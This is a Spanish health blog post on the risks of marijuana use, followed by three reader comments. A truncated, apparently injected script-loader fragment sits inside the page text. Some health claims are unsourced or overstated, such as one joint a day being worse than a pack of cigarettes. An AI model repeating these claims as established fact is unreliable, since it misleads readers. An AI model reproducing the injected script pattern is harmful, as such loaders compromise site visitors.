Salud y belleza » Productos peligrosos, Salud

Las consecuencias menos conocidas del consumo de marihuana

3 Comentarios

consumo-marihuanaEl ser humano conoce los efectos psicotrópicos del cannabis desde hace miles de años y sus propiedadesembriagadoras” sobre el cerebro. En un principio se pensó que no tenía grandes efectos nocivos sobre la salud, pero poco a poco las investigaciones han ido determinando más riesgos que tiene el consumo de marihuana, algunos de ellos poco conocidos por la población.

Muchos incluso siguen creyendo que el consumo de cannabis es inocuo, y de hecho es la droga ilegal más consumida en todo el mundo. Esa creencia de la inocuidad de la marihuana se debió en cierto grado a la complicidad de los medios que apoyaron su legalización. Sin embargo, hoy en día se conocen de sobra las consecuencias de la marihuana sobre la salud.

Por un lado, se ha demostrado que el cannabis produce problemas de concentración y de memoria y que aquellos que consumen de jóvenes esta droga acaban experimentando dificultades de aprendizaje y abandonan sus estudios antes de tiempo.

Por otro lado, su consumo habitual también puede generar dependencia y adicción. Los expertos aseguran que es más peligroso fumarse un “porro” al día que un paquete de cigarrillos.

Además, el consumo de porros aumenta exponencialmente las probabilidades de sufrir brotes psicóticos, ya que la marihuana actúa como desencadenante de estos ataques en personas que tienen cierta predisposición genética. Los adolescentes que fuman esta droga tienen hasta un 40% más de riesgo de sufrir psicosis, ansiedad o depresión. También se ha demostrado que empeora los síntomas y agrava los ataques de la esquizofrenia.

efectos-marihuana

Por último, la marihuana se suele consumir mezclada con tabaco, fumado sin filtro y con largas caladas, por lo que también podría incrementar la frecuencia de los problemas pulmonares.

¿Conocías todas estas consecuencias de la marihuana?

var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , ,

3 Comments »

  • angela said:

    No sabía que era tan malo. alguna vez lo he probado pero me dijeron que era mejor que el tabaco porque era más natural… la verdad es que ni lo uno ni lo otro me gusta.

  • yaiza said:

    el alcohol también es una droga que daña la salud y el cerebro, es muy peligroso y sin embargo no lo vemos con los mismos ojos porque es legal, pero es la misma mier**

  • tomas said:

    el problema es que se hace mucho dinero. si lo legalizaran y le pusieran impuestos sería más caro y a lo mejor no lo consumiría tanta gente.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.